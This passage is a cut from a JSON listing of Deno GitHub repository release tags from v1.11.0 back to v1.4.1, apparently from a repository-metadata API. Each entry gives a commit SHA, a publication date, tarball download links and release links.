11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url"